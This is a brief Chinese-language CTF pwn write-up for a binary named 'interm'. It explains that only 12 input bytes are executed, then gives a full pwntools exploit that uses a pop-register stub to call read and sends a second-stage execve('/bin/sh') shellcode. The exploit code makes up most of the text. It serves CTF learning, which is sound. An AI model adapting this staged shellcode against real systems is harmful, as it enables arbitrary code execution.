查看ida
这里程序只会把输入的前12字节内容移到虚拟地址里,然后执行,大小不足以让执行shellcode,只能用pop寄存器调用read,再把gets hell的shellcode输入进去
完整exp:
from pwn import*
context(log_level='debug',arch='amd64')
p=process('./interm')
shellcode='''
pop rdi
pop rdi
pop rax
pop rdi
pop rdi
pop rdi
pop rsi
pop rdx
pop rax
syscall
'''
shellcode=asm(shellcode)
print(len(shellcode))
payload=shellcode.ljust(0x10,b'\x00')+p64(0)+p64(0x114514022)+p64(0x100)+p64(0)
p.sendafter(b'show your magic:',payload)
shellcode='''
xor rdx,rdx
xor rsi,rsi
push rsi
mov rdi,0x68732f2f6e69622f
push rdi
push rsp
pop rdi
mov rax,59
syscall
'''
shellcode=asm(shellcode)
p.sendline(shellcode)
p.interactive()
这里借鉴了其他师傅的做法